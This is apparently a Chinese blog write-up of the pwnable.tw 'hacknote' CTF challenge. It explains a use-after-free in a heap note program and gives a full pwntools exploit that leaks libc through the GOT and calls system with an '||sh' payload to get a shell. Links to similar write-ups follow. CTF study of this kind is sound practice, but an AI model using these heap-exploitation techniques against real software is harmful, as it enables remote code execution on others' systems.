【PWN刷题】Pwnable-hacknote

于 2023-05-06 15:15:21 发布
阅读量391 收藏 1
点赞数
分类专栏: Pwn刷题之路 文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/QYbudong/article/details/130521407
版权

题目来源:https://pwnable.tw/challenge

前言

回顾经典老题。

一、Pwnable-hacknote

1.检查保护

32位没开PIE,堆题一般全开。

2.IDA分析

①太经典辣,堆菜单题。三个功能,add、delete和show。

 ②看堆题先看delete,果然free后没有置空,存在UAF漏洞。

③观察add函数,ptr数组每个单元0x8大小,前4用来存note指针,发现了sub_804862B函数puts指针,可以用来泄露libc。

 

3.漏洞利用:

①add两个fastbin chunk,0x8<size=<0x80

②delete上边两个chunk,虽然free了但是没置0

③add一个size为8的chunk2,content为p32(0x0804862b)+函数got地址

④show(0),由于delete没有置空,ptr中还存放着note原来的地址,我们新加入的chunk2覆盖了chunk0的ptr,当show(0)时直接调用了0x0804862b输出了函数libc地址。

⑤操作如上,我们通过偏移找到system地址,调用system执行system(sh)

4.EXP

#!/usr/bin/env python3
# coding = utf-8

from pwn import *
context(arch = "i386", os = "linux", log_level = "debug")

def send_choice(choice):
    p.recvuntil('choice :')
    p.sendline(str(choice))

def add(size,content):
    send_choice(1)
    p.recvuntil('size :')
    p.sendline(str(size))
    p.recvuntil('Content :')
    p.sendline(content)

def delete(index):
    send_choice(2)
    p.recvuntil('Index :')
    p.sendline(str(index))
    
def show(index):
    send_choice(3)
    p.recvuntil('Index :')
    p.sendline(str(index))


#p = process('./hacknote')
p = remote("chall.pwnable.tw",10102)
elf = ELF('./hacknote')
libc=ELF("./libc_32.so.6")
#gdb.attach(p, "")


add(0x20, b'0')#0
add(0x20, b'1')#1
delete(0)
delete(1)
payload = p32(0x0804862b) + p32(elf.got['puts'])#leak libc
add(8, payload)
show(0)
libc_puts = u32(p.recv(4))


libc_base = libc_puts - libc.symbols['puts']
system = libc_base + libc.symbols['system']

delete(2)
payload = p32(system) + b'||sh'
add(0x8, payload)
show(0)

p.interactive()

QY不懂
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
pwnable_hacknote_WP
weixin_56434818的博客
03-01 739
pwnable_hacknote_WP 文章目录pwnable_hacknote_WP检查保护分析ELFAdd noteDelete notePrint note利用思路exp 检查保护 ​ i386架构,RELRO半开,开了Canary和NX,没开PIE。 分析ELF 先跑一下 类似菜单的程序,有增、删、查的操作。 IDA反编译后发现主函数主要就是根据选项选择菜单内相应功能的作用,若输入范围之外的数字则会出现错误提示并重新选择。(因为主函数逻辑不是很复杂所以这里就不贴反编译出来的代码了) Add no
攻防世界-PWN进阶区-hacknote(pwnable.tw)
weixin_44145820的博客
03-04 587
攻防世界中这道题是pwnable.tw上面的原题,虽然在攻防世界上难度为7星,不过实际上这题不算难,只需要利用UAF就可以完成。 题目分析 题目链接:https://pan.baidu.com/s/1T-mIVLkxvyZ_7VvlBuInZQ 提取码:azyd checksec: 保护机制比前几题弱了很多 main: hacknote实现了三个功能: 1.添加(上限为5) 在新建no...
Hacknote 一道简单的UAF漏洞题
红叶的博客
03-09 343
看了大佬们的WP两天,勉强搞懂了原理。如有任何错误请在评论区指出。
pwnable_hacknote
z1r0的博客
12-28 331
pwnable_hacknote 查看保护 通过uaf改content指针为got,泄露出libc,接着改puts指针为system,放入;/sh\x00即可。 pwnable专题 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27791) else:
pwnable.tw——hacknote分析
Eagle_hwei的博客
02-24 391
hacknote的题目分析 2020-02-2421:22:47 by hawkJW 题目附件、ida文件及wp链接   这是一道比较经典的题目,所以稍微记录一下   1.  程序流程总览 首先,还是老规矩,看一下保护情况   可以看出来,PIE没有开启,可以修改got表,其余基本上都开启了,保护程度一般吧。下面我们来看一下程序的具体流程吧。 没什么好说的,还是比较经典的...
pwn学习——UseAfterFree hacknote
MrTreebook的博客
11-28 250
pwn学习——UseAfterFree hacknote1. 反编译看一下源代码2.add_note3.print_note4.del_note5.exp6.运行结果 1. 反编译看一下源代码 可以看到大概有四个功能 add del print menu 另外还有后门函数magic 2.add_note 可以看到在添加note的时候,每一个note有两个部分 第一个部份是一个put函数 第二个部分存放的是real_content 一个note节点内部结构是这样的 3.print_note 调用pu
谷歌师兄的leetcode刷题笔记-Pwn-Pad-Arsenal-Tools:适用于Android设备的渗透测试应用
06-30
谷歌师兄的leetcode刷题笔记Pwn Pad 阿森纳工具 大家好, 我正在使用 Pwn Pad 2013(适用于 2012 版 Nexus 7 平板电脑)。 这是我最喜欢的 Android 应用程序列表以及一些 .sh 和 .apk 源和链接。 希望它会对某人有所...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
pwn-me-backend
03-28
"pwn-me-backend" 是一个基于Java开发的后端项目,根据其命名,可能是用于网络安全教育或CTF(Capture The Flag)竞赛中的一个靶场平台。这个项目可能包含了一些漏洞,目的是让学习者或者参赛者通过逆向工程、内存...
Pwn-list-TYctf新生考核
最新发布
03-31
新生考核pwn题目和源码以及部署指南
buuctf hacknote
qq_65147345的博客
07-17 813
程序有uaf漏洞,可以通过uaf漏洞更改输出函数为........
hacknote 攻防世界
qq_41071646的博客
05-18 494
这个题我以前做过 只不过这次没有了后门函数 下面这个链接是我以前做的题的链接 https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/use_after_free/ 有了上次的经验 这次做的还比较顺利 思路其实差不多的 from pwn import* io=remote("111.198.29.45",52641) #io=p...
hacknote
m0_48127441的博客
04-23 128
0x0804A050 指针数组 32位 1.alloc malloc(0x8) == >chunk(0x10) struct note {函数地址,内容指针} malloc(size) 2.del free(note.内容指针) free(note) 3.print s[idx](s[idx]) 4.exit free(fas...
(攻防世界)(pwnhacknote
PLpa的博客
07-31 3392
use after free 堆!堆!堆! 终于对堆的结构有了一定的了解,开始做堆的题目,恰巧攻防世界xctf中有这么一题可以练练手,还是挺不错的。。。 对于use after free呢,这里有ctf-wiki的学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/use_after_free-zh/ 写的非常详细,很实用...
pwn hacknote
doudoudedi
10-28 367
这道题增加堆块会将printf函数的got表地址和将要打印的地址放入一个申请的堆块里面存在uaf漏洞可以先创建2个堆块然后释放申请0x8大小的堆块根据堆分配的原则我们先使用1的第一个然后使用0的第一个然后就修改了指针指向读到flag的函数即可 exp: from pwn import * p=process('./hacknote') elf=ELF('./hacknote') def debug...
hacknote 记录
weixin_55190422的博客
11-27 340
做了这么久的Pwn终于遇到堆的题目了。 而此处就有一个漏洞——UAF漏洞,即释放之后并没有清空指针,则仍然可以调用其他的相关函数。 也就是,实际上调用了控制chunk可用部分的前4个字节的函数指针所指向的函数,参数为控制chunk可用部分地址。 那么,如果我们可以修改控制chunk中可用部分的前4个字节所指向的位置,修改为system,并在后四个字节中添加上 ||sh (这里一开始没想到,注意为了执行shell命令,可以的一些方法 sh# 或者 ||sh ,前一个可以注释掉后面的...
强网杯2022 pwn 赛题解析——house_of_cat
CoLin的pwn小屋
08-04 2873
强网杯2022 pwn 赛题分析——house_of_cat

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值